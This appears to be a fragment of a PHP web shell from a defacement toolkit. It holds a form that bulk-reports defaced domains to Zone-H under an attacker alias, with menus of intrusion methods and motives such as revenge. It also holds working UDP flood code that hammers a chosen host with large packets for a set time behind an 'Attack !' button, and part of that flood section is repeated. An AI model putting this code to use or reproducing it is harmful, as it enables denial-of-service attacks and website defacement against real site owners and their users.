- <br><br><? echo '<p style="text-align: center;"> <img alt="" src="data:image/gif;base64,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
- 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%3D" style="width: 261px; height: 67px;" /></p>
- <center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="AL.MaX HaCkEr" /><br> <select class="inputz" name="hackmode">
- <option>------------------------------------SELECT-------------------------------------</option>
- <option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
- <option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
- <option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
- <option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
- <option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
- <option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
- <option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
- <option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
- <option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
- <option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
- <option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
- <option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
- <option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
- <option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
- <option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
- <option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
- <option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
- <option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
- <option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
- <option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
- <option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
- <option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
- option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
- </select> <br>
- <select class="inputz" name="reason">
- <option >------------------------------------SELECT-------------------------------------</option>
- <option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
- <option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
- <option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
- <option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
- <option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
- <option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
- <option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
- option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
- </select> <br>
- <textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
- <input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
- </form>'; ?>
- <?
- echo "</form></center>";?>
- <?
- function ZoneH($url, $hacker, $hackmode,$reson, $site )
- {
- $k = curl_init();
- curl_setopt($k, CURLOPT_URL, $url);
- curl_setopt($k,CURLOPT_POST,true);
- curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
- curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
- $kubra = curl_exec($k);
- curl_close($k);
- return $kubra;
- }
- {
- ob_start();
- $sub = @get_loaded_extensions();
- if(!in_array("curl", $sub))
- {
- die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
- }
- $hacker = $_POST['defacer'];
- $method = $_POST['hackmode'];
- $neden = $_POST['reason'];
- $site = $_POST['domain'];
- if (empty($hacker))
- {
- die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
- }
- elseif($method == "--------SELECT--------")
- {
- die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
- }
- elseif($neden == "--------SELECT--------")
- {
- die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
- }
- elseif(empty($site))
- {
- die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
- }
- $i = 0;
- $sites = explode("\n", $site);
- while($i < count($sites))
- {
- if(substr($sites[$i], 0, 4) != "http")
- {
- $sites[$i] = "http://".$sites[$i];
- }
- ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
- echo "Domain : ".$sites[$i]." Defaced Last Years !";
- ++$i;
- }
- echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]";
- }
- ?>
- <?php }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=dos" method="post">
- <?php
- //UDP
- if(isset($_GET['host'])&&isset($_GET['time']))
- {
- $packets = 0;
- ignore_user_abort(TRUE);
- set_time_limit(0);
- $exec_time = $_GET['time'];
- $time = time();
- //print "Started: ".time('d-m-y h:i:s')."<br>";
- $max_time = $time+$exec_time;
- $host = $_GET['host'];
- for($i=0;$i<65000;$i++){
- $out .= 'X';
- }
- while(1){
- $packets++;
- if(time() > $max_time){ break; }
- $rand = rand(1,65000);
- $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
- echo '<br><br>
- <form action="'.$surl.'" method=GET>
- <input type="hidden" name="act" value="phptools">
- Host: <br><input type=text name=host><br>
- Length (seconds): <br><input type=text name=time><br>
- <input type=submit value=Go>
- </form>';
- }
- else
- {
- echo '<center><form action=? method=GET><input type="hidden" name="act" value="phptools">
- <table class="tabnet" style="width:300px;">
- <tr>
- <th colspan="2">UDP Flood</th>
- </tr>
- <tr>
- <td> Host</td>
- <td><input style="width:220px;" class="inputz" type=text name=host value=></td>
- </tr>
- <tr>
- <td> Length (seconds)</td>
- <td><input style="width:220px;" class="inputz" type=text name=time value=></td>
- </tr>
- <tr>
- <td><input style="width:100%;" class="inputzbut" type="submit" value="Attack !" /></td>
- </tr>
- </table>
- </center>';
- }
- }
- elseif(isset($_GET['x']) && ($_GET['x'] == 'dos'))
- {
- ?>
- <form action="?y=<?php echo $pwd; ?>&x=dos" method="post">
- <?php
- //UDP
- if(isset($_GET['host'])&&isset($_GET['time']))
- {
- $packets = 0;
- ignore_user_abort(TRUE);
- set_time_limit(0);
- $exec_time = $_GET['time'];
- $time = time();
